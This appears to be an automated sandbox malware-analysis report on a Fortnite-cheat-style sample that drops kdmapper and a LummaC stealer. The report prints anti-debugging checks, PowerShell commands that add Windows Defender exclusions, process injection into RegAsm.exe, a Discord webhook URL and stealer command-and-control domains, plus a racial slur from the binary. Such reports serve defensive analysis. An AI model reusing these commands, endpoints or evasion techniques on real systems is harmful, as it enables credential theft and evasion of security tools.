Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: seoI30IZZr.exe	Binary or memory string: IMGUI_IMPL_DX9IMGUI_IMPL_WIN32#SCROLLX#SCROLLY[X][ ]-------------------------------- \|##COMBO_%02DUNKNOWN ITEM%I64U%LF%.*S%%D%SUNKNOWN EXCEPTIONBAD ARRAY NEW LENGTHSTRING TOO LONG: GENERICBAD CASTC\\.\ORQUR-ONTOP-FUCKING-NIGGERNPC][##RADARNTDLL.DLLNTQUERYINFORMATIONPROCESSISDEBUGGERPRESENTKERNEL32.DLLNTSETINFORMATIONTHREADOLLYDBG.EXEX64DBG.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEGHIDRA.EXEWINDBG.EXEOLLYDBGWINDBGFRAMECLASSIDAVW64IDAVW32DBGHELP.DLLDBGCORE.DLL: "", "EXISTSSUCCESSHTTPS://DISCORD.COM/API/WEBHOOKS/1247249666907701321/MHNII9J0YWG308W-RJBT6RXKALF0IFLJIGI4SGWLEDUFWWOFGLNFE9ULMGNRQPPHDYLKHTTPS://AUTH.GG/HEADNECKCHESTRANDOMLEFT MOUSERIGHT MOUSEMIDDLE MOUSEMOUSE 5MOUSE 4BACKSPACEENTERSHIFTCONTROLALTPAUSECAPSESCAPESPACEPAGE UPPAGE DOWNENDHOMELEFTUPRIGHTDOWNPRINTINSERTDELETE046789DEFGHIJKLMNOPQRSTUVWNUMPAD 0NUMPAD 1NUMPAD 2NUMPAD 3NUMPAD 4NUMPAD 5NUMPAD 6NUMPAD 7NUMPAD 8NUMPAD 9MULTIPLYADDSUBTRACTDECIMALDIVIDEF1F2F3F4F5F6F7F8F9F10F11F12SELECT KEYPRESS KEYC:\WINDOWS\FONTS\IMPACT.TTFFORTNITEWINVERSHOTGUNORQUR PUBLIC
Source: seoI30IZZr.exe	Binary or memory string: OLLYDBG.EXE
Source: seoI30IZZr.exe	Binary or memory string: X64DBG.EXE
Source: seoI30IZZr.exe	Binary or memory string: WINDBG.EXE

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Windows\Speech\physmeme.exe	Memory allocated: 2C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory allocated: 2CE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Edge\msedge.exe	Memory allocated: 750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Edge\msedge.exe	Memory allocated: 1A780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Edge\msedge.exe	Memory allocated: 15D0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1B040000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: F40000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1A9F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Memory allocated: D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Memory allocated: 1ACA0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1790000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1B080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Memory allocated: 14C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Memory allocated: 1AE40000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Code function: 0_2_00007FF786614BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,

0_2_00007FF786614BD0

Source: C:\Windows\Speech\physmeme.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9141
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9178

Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jsWPmlvb.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KiGKqBgX.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oYbYVUjG.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AznuGYbp.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rWfFWfLI.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EagcoYZU.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OJAsYAeC.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IlfCUBRc.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ERJdElGX.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mOEXVCEF.log	Jump to dropped file

Source: C:\Users\user\Desktop\seoI30IZZr.exe

API coverage: 5.3 %

Source: C:\Windows\Speech\physmeme.exe TID: 1288	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5420	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Edge\msedge.exe TID: 3524	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164	Thread sleep count: 9141 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4820	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1292	Thread sleep count: 9178 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6724	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 6012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 2756	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe TID: 3020	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 6916	Thread sleep time: -30000s >= -30000s
Source: C:\Edge\msedge.exe TID: 2264	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe TID: 3164	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662DB3C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,	0_2_00007FF78662DB3C
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0060A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	5_2_0060A69B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0061C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	5_2_0061C220
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0062B348 FindFirstFileExA,	5_2_0062B348

Source: C:\Windows\Speech\kdmapper.exe

Code function: 5_2_0061E6A3 VirtualQuery,GetSystemInfo,

5_2_0061E6A3

Source: C:\Windows\Speech\physmeme.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477

Source: C:\Edge\msedge.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior

Source: msedge.exe, 00000033.00000002.2146483531.000000001BAE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW9
Source: msedge.exe, 00000033.00000002.2125912373.000000001312A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: aZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: kdmapper.exe, 00000005.00000003.1500381537.0000000003031000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: RegAsm.exe, 0000000C.00000002.1538540291.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: curl.exe, 00000007.00000003.1508973721.000001B321123000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.1509387760.000001B321126000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1509003906.000001B321125000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: curl.exe, 00000004.00000003.1492352878.0000019B0A2B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM

Source: C:\Windows\Speech\kdmapper.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\seoI30IZZr.exe

0_2_00007FF786614BD0

Hides threads from debuggers

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Open window title or class name: windbgframeclass
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Open window title or class name: ollydbg.exe

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00446730 LdrInitializeThunk,

12_2_00446730

Source: C:\Users\user\Desktop\seoI30IZZr.exe

0_2_00007FF786614BD0

Source: C:\Users\user\Desktop\seoI30IZZr.exe

0_2_00007FF786614BD0

Source: C:\Users\user\Desktop\seoI30IZZr.exe

0_2_00007FF786614760

Source: C:\Windows\Speech\kdmapper.exe

Code function: 5_2_00627DEE mov eax, dword ptr fs:[00000030h]

5_2_00627DEE

Source: C:\Users\user\Desktop\seoI30IZZr.exe

0_2_00007FF786614BD0

Source: C:\Edge\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Edge\msedge.exe	Process token adjusted: Debug
Source: C:\Edge\msedge.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662D730 SetUnhandledExceptionFilter,	0_2_00007FF78662D730
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662D588 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF78662D588
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662CE38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF78662CE38
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0061F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0061F838
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0061F9D5 SetUnhandledExceptionFilter,	5_2_0061F9D5
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0061FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0061FBCA
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_00628EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00628EBD

Source: C:\Windows\Speech\physmeme.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe'
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\Speech\physmeme.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Speech\physmeme.exe

Code function: 9_2_02EC2129 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

9_2_02EC2129

Injects a PE file into a foreign processes

Source: C:\Windows\Speech\physmeme.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: strappystyio.shop
Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: coursedonnyre.shop
Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fossillargeiw.shop
Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tendencerangej.shop
Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: appleboltelwk.shop
Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tearrybyiwo.shop
